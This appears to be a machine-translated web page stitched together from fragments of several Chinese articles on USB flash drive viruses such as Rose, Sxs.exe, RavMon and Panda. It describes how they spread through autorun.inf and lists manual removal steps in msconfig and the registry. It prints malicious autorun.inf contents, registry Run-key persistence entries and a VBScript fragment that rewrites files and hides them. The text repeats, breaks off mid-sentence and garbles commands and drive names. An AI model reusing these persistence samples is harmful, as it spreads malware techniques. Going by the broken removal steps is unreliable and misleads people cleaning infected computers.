The disk partition cannot be opened by double-clicking;
Insert a USB flash drive to cause viruses;
After the virus is installed, the system is completely reinstalled (that is, reinstalling the system disk after formatting or restoring the ghost), but the virus is still rampant. This article will teach you the causes of these phenomena, the corresponding defensive strategies and solutions.
First, let's talk
and see what it's about:[AutoRun]Open=recycle.exeShell\1= Open (o)Shell\1\command=recycle.exeshell\2= browse (B)Shell\2\command=recycle.exeShellexecute=recycle.exeObviously, each time the USB stick automatically plays, will run Recycle.exe this program. Now you can try to remove Autorun.inf, Recycle.exe, and four other virus files, then unplug the USB flash drive, then reconnect the USB drive in the virtua
"Delete "Autorun.inf" Files and "Sxs.exe" files under C diskSelect "Open" with the right mouse button on the D disk.Delete the "Autorun.inf" file and the "Sxs.exe" file under D disk (another file is also, an. exe deleted it)......And so on, delete all the AUTORUN on the disk. INF files and "Rose.exe" filesClick Start Select "Run" enter "regedit" (no quotes), carriage returnExpand the Registry Editor to the left of my computer >hkey_local_machine>softw
continue searching for adjacent IP addresses for Fast propagation.
2. When a virus is executed, the following files are generated:
Using system1_hxdef.exe%Systempolicipolice.exe%System%WinHelp.exe%Systemw.netmeeting.exe (61,440 bytes)Using system1_spollsv.exe (61,440 bytes)% SysDir % IEXPLORE. EXE% SysDir % kernel66.dll%Sysdir1_ravmond.exe% WinDir % SYSTRA. EXE% SysDir % msjdbc11.dll% SysDir % MSSIGN30.DLL% SysDir % ODBC16.dll% System % lmmibw.dll
C:
HDM.exe is a vicious u disk virus, its destructive power, mainly in the following areas:Quote:1. Use recovery SSDT to destroy antivirus software2.IFEO Image Hijacking3. Close the specified window4. Delete gho file5. Destroy Safe mode, and Show hidden file function6. Infection HTM and other Web files7. Guess the password is spread through LAN8. Through the U disk and other mobile storage transmission9.arp DeceptionThe specific analysis is as follows:Qu
Teach you how to clean up the rose virus in the USB flash drive
The rose virus, one of the three major viruses of a USB flash drive, is believed to be a frequent visitor to many of its friends ". Rosevirus (rose.exe) is a benign virus consisting of two file carriers, namely ROSE. EXE and AUTOEXEC. BAT, double-click the storage device to read
to the system, and wait for several minutes without the trend of virus attacks. In this case, virus programs are affecting computers.
".
Select it to end the process, and the computer restores the calm of the past. The first stage of detoxification is successful.
Next, let's see where the virus is hidden. Open "msconfig", start the system configuration, and sele
and folders" option below
Click "OK"
With the right mouse button point C disk (can not double-click!) Select Open
Delete "Autorun.inf" Files and "Sxs.exe" files under C disk
Select "Open" with the right mouse button on the D disk.
Delete the "Autorun.inf" file and the "Sxs.exe" file under D disk (another file is also, an. exe deleted it)
......
And so on, delete all the AUTORUN on the disk. INF files and "Rose.exe" files
Click Start Select "Run" ente
, delete all the AUTORUN on the disk. INF files and "Rose.exe" files
Click Start Select "Run" enter "regedit" (no quotes), carriage return
Expand the Registry Editor to the left of my computer >hkey_local_machine>software>microsoft>windows>currentversion>run
Delete the ROSE (C:\windows\system32\SXS.exe) item in the Run item
Close Registry Editor
And then restart the computer
Remove the hard drive is Rose:
Press the SHIFT key to insert the USB drive u
the use of white Panda incense icon, virus after running the copy itself to the system directory:
%system%\drivers\spoclsv.exe
To create a startup item:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Svcshare" = "%system%\drivers\spoclsv.exe"
Modify registry information to interfere with the "Show All Files and folders" setting:
[Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showa
we will often see under the various partition root directories of the hard disk " Autorun.inf"Such a file, and double-click the disk partition icon with the mouse, often can not open the corresponding partition window ; similar to the above, it is almost certain that the local computer system has been infected with the recent rampant Flash disk virus, the virus generally through the " Autorun.inf"file for p
. The rising experts will analyze it in detail!
Principle of USB flash drive Virus
The USB flash drive virus is usually transmitted using the automatic playback function of the Windows system. Automatic playback is a convenient function provided by Windows. However, it is exploited by hackers to increase the possibility of virus transmission.
: After th
\Microsoft\Command Processor"AutoRun" = "C:\\windows\\system32\\candoall.exe"This loading method is still rare.Using IceSword () manual Anti-Virus process:1, end C:\WINDOWS\system32\candoall.exe and iexplore.exe process.2, delete the following files (detailed steps: Open the Ice Blade (IceSword)-file-in turn, find the virus file deletion can be):C:\WINDOWS\system
Pandatv virus official version V1.6:
This tool detects, clears, and fixes files infected with the pandatv virus. It detects and processes unknown pandatv variants and can process all of the current pandatv family and related variants. As follows:
Download this file
The test is easy to use. The above software has two exclusive killing tools that can be used in turn to achieve better results.
After a file co
First of all, no matter what virus you have, if you do not understand the meaning or suspected of a virus, please refer to my plan to try first:
4. Start = "Run =" Input: msconfig= "OK =" start = "all disabled (D) =" OK
5. Start = "Run =" Input: regedit= "OK =" hkey_local_machine\software\microsoft\windows\currentversion\run\= "Right can be deleted all
6. Start = "Run =" Input: regedit= "OK =" hkey_loca
With the rising of the virus can not be worse, with Kabbah upgrade to May 25 after the ability to find, but note that Kabbah will infect Word documents, pictures together delete!
Because a lot of documents are urgent and important, if lost on the problem is serious, so do not understand the computer do not use Kaspersky, because he is too professional.
Fortunately, the source file is not many, I deleted a few, the specific removal method on the Intern
fso.deletefile fpath,true Set fc=fso. OpenTextFile (fpath,2,true) fc.write content FC. Close Set fc=nothing set Fa=fso.getfile (Fpath) fa.attributes=7 set fa=nothing "
End Sub
The code above has added a lot of annotations, and if you can see it here, it's probably going to be a pretty good idea. The code itself is generally encoded in quality, because this code is downloaded from a website of the South Normal University, so it is estimated that it is a student.In this
modify its key value to 1, then, select "show all hidden files" and "Show System Files" in the folder -- tools -- folder option ".
Worker Process ).
4. Start-run-msconfig to delete the startup items of the above virus.
5.d、e0000f..open the right-click option and delete the sxs.exe and autorun. inf files on each drive.
Check whether there are any of the above processes in the process. If there are other ins
Recent U disk viruses such as autorun.infand ravmon.exe are rampant, causing strong dissatisfaction.The virus automatically modifies the registry so that users cannot view the following hidden file autorun. inf:[AutoRun] opentracing RavMon.exe shellopen = open ( O) shellopencommand#ravmon.exe shellexplore = Resource Manager ( X) shellexploreCommand = "RavMon.exe-
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.